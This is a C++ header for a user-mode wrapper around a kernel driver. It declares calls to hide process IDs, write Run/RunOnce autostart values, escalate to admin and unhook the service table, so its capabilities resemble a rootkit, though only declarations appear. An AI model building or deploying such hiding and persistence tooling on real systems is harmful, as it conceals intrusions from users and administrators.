UnHookClass.h
#define PREAMBLE_SIZE 10
#pragma pack(1)
// Fix-up record for one function, in the byte-packed layout the driver expects
// (the enclosing #pragma pack(1) applies): the function's address plus the
// first PREAMBLE_SIZE (10) bytes of its code, presumably the original bytes
// saved so a hook can be undone. Field order and widths are the wire format
// shared with the kernel side -- do not reorder or widen them.
// NOTE(review): func_addr is a 32-bit DWORD, so this layout can only describe
// a 32-bit kernel; the class comments in this header target XP/Vista, so that
// is presumably intended -- confirm before any x64 build.
struct fixup_entry {
    DWORD         func_addr;                     // address of the function to patch
    unsigned char func_preamble[PREAMBLE_SIZE];  // saved leading bytes of that function
};
typedef struct fixup_entry fu_entry;
// Request to restore one hooked entry: which slot to fix and the fix-up data
// for it. Presumably the payload of IOCTL_UNHOOK (the IOCTL/struct pairing is
// in the .cpp, not visible here). Byte-packed wire format.
// NOTE(review): if the driver writes fix_up.func_preamble to fix_up.func_addr
// exactly as supplied by user mode, this request is a kernel write-what-where
// gated only by who may open the device. The driver should validate both
// fields against its own saved table rather than trust them -- verify.
struct UnHookEntry {
    unsigned int index;   // slot in the service table (cf. HideDevice::SDT_Table)
    fu_entry     fix_up;  // address + bytes to write back
};
typedef struct UnHookEntry UHE;
// Payload for the hide-PID request (cf. HideDevice::unhook_hidepid): the PID
// and whether it is being added to (is_add != 0) or removed from the hide
// list. Byte-packed wire format; both fields are 32-bit DWORDs, so the struct
// size does not depend on the compiler's BOOL/bool width.
struct AddPidEntry {
    DWORD PID;     // process id to hide / unhide
    DWORD is_add;  // non-zero: add to the list; zero: remove from it
};
typedef struct AddPidEntry APE;
// Registry request handed to the driver: write or delete a value under the
// Run/RunOnce key (cf. HideDevice::unhook_regwrite* / unhook_regdelete*).
// Byte-packed wire format with fixed-size WCHAR buffers.
// NOTE(review): 256 / 50 / 1024 WCHARs are hard limits for whatever the
// user-mode wrappers copy in from caller-supplied strings. The copy must be
// bounded to these sizes and leave the strings NUL-terminated inside the
// buffer; that code lives in the .cpp and is not visible here -- verify it.
struct registry_entry {
    DWORD is_deleting;      // non-zero: delete the value; zero: write it
    WCHAR key_name[256];    // registry key path
    WCHAR value_name[50];   // value name under key_name
    WCHAR value[1024];      // value data (unused when deleting, presumably)
};
typedef struct registry_entry REE;
#pragma pack()
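// User-mode front end for the "H4" unhooking / hiding driver. Each public
// method wraps one request to the driver's control device (see the IOCTL_*
// definitions at the bottom of this header). The driver-side behaviour is not
// visible from this file, so the per-method notes restate the original
// author's comments rather than verified semantics.
//
// Fix: the in-class declarations were written as `HideDevice::name(...)`.
// That redundant qualification is ill-formed in standard C++ (accepted only
// as a Microsoft extension) and rejected by GCC/Clang ("extra qualification");
// the qualifiers are removed here. Signatures are otherwise unchanged.
//
// NOTE(review): the object owns a device HANDLE (hFile) and declares a
// destructor, but copy construction/assignment are left implicitly defined,
// so copying a HideDevice aliases the handle (a double close if the destructor
// closes it). Deleting the copy operations is the right fix; it is not done
// here because it would change the interface for existing callers -- confirm
// that none of them copy the object.
class HideDevice
{
public:
    // Closes the handle to the unhook device.
    void unhook_close();

    // Unhooks every hooked function. is_fixup: presumably whether the saved
    // original preamble (fu_entry) is written back -- confirm in the .cpp.
    BOOL unhook_all(BOOL is_fixup);

    // Unhooks a single function, selected by name.
    BOOL unhook_func(char *func_name, BOOL is_fixup);

    // Adds (is_add != 0) or removes a PID from the driver's hide list.
    BOOL unhook_hidepid(DWORD PID, BOOL is_add);

    // Original comment: on Vista turns the caller into a "proper" admin
    // (do not use on XP). This is a privilege-change request to the driver;
    // exactly what it alters is not visible here.
    BOOL unhook_getadmin();

    // Reports whether the named driver is currently running.
    BOOL unhook_isdrv(WCHAR *driver_name);

    // Returns the named driver's path in driver_path. size is the buffer
    // size; whether it counts bytes or WCHARs is not visible here -- confirm
    // in the .cpp before sizing the buffer.
    BOOL unhook_getpath(WCHAR *driver_name, WCHAR *driver_path, DWORD size);

    // Reports whether the unhooking device is present.
    BOOL unhook_isdev();

    // Inserts a value into Run/RunOnce (wide-char variant).
    BOOL unhook_regwriteW(WCHAR *value_name, WCHAR *value);
    // Deletes a value from Run/RunOnce (wide-char variant).
    BOOL unhook_regdeleteW(WCHAR *value_name);
    // Inserts a value into Run/RunOnce (char variant).
    BOOL unhook_regwriteA(char *value_name, char *value);
    // Deletes a value from Run/RunOnce (char variant).
    BOOL unhook_regdeleteA(char *value_name);

    // Removes the driver from the registry.
    BOOL unhook_uninstall();

    // Mounts a "real" device (original comment). The single-WCHAR `freezed`
    // parameter looks like a drive letter -- TODO confirm.
    BOOL df_thaw(WCHAR freezed, WCHAR *thawed);
    // Unmounts a "real" device (original comment).
    BOOL df_freeze();

    HideDevice(void);
    // Also installs the driver found at driver_path (original comment: the
    // forcing works only on XP).
    HideDevice(WCHAR *driver_path);
    ~HideDevice(void);

private:
    // Opens the device / prepares the SDT table; details live in the .cpp.
    BOOL unhook_init();

#define NUM_OF_SERVICES 0x300
    // Fix-up entries for the service table ("SDT", presumably the service
    // descriptor table): 0x300 = 768 slots of packed 14-byte fu_entry, about
    // 10.5 KB stored inline in the object.
    fu_entry SDT_Table[NUM_OF_SERVICES];
    DWORD    sdt_entry_count;  // number of valid entries in SDT_Table
    HANDLE   hFile;            // handle to the driver's control device
    BOOL     sdt_init;         // whether SDT_Table has been populated
};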
// Fallback definitions for the <winioctl.h> helpers, so this header builds
// when that SDK header is not included. They mirror the SDK layout:
// DeviceType in bits 16+, Access in bits 14-15, Function in bits 2-13,
// Method in bits 0-1.
#ifndef CTL_CODE
#define CTL_CODE( DeviceType, Function, Method, Access ) ( \
((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method) \
)
#endif
#ifndef METHOD_BUFFERED
#define METHOD_BUFFERED 0
#endif
#ifndef FILE_WRITE_ACCESS
#define FILE_WRITE_ACCESS ( 0x0002 )
#endif
// Custom device type for the driver (0x8000 and above is the range the SDK
// leaves to third-party drivers).
#define FILE_DEVICE_H4DRIVER 0x00008234
// Per-request function codes (vendor range, 0x800 and above). Note ADMIN is
// 0x882 although it is listed after UNHOOK/ADDPID below.
#define ADMIN_FUNCTION 0x0882
#define UNHOOK_FUNCTION 0x0883
#define ADDPID_FUNCTION 0x0884
#define REG_FUNCTION 0x0885
#define THAW_FUNCTION 0x0886
#define FREEZE_FUNCTION 0x0887
#define UNINSTALL_FUNCTION 0x0888
// Control codes exchanged with the driver. All are METHOD_BUFFERED and carry
// FILE_WRITE_ACCESS, so they are meant to be refused on a handle opened
// without write access. That says nothing about WHO may open the device:
// that is decided by the device object's security descriptor in the driver,
// which is not visible in this header. The hex comments are the expanded
// values (DeviceType 0x8234 << 16 | 2 << 14 | Function << 2).
#define IOCTL_UNHOOK CTL_CODE(FILE_DEVICE_H4DRIVER, UNHOOK_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A20C
#define IOCTL_ADDPID CTL_CODE(FILE_DEVICE_H4DRIVER, ADDPID_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A210
#define IOCTL_ADMIN CTL_CODE(FILE_DEVICE_H4DRIVER, ADMIN_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A208
#define IOCTL_REG CTL_CODE(FILE_DEVICE_H4DRIVER, REG_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A214
#define IOCTL_THAW CTL_CODE(FILE_DEVICE_H4DRIVER, THAW_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A218
#define IOCTL_FREEZE CTL_CODE(FILE_DEVICE_H4DRIVER, FREEZE_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A21C
#define IOCTL_UNINST CTL_CODE(FILE_DEVICE_H4DRIVER, UNINSTALL_FUNCTION, METHOD_BUFFERED, FILE_WRITE_ACCESS) // 0x8234A220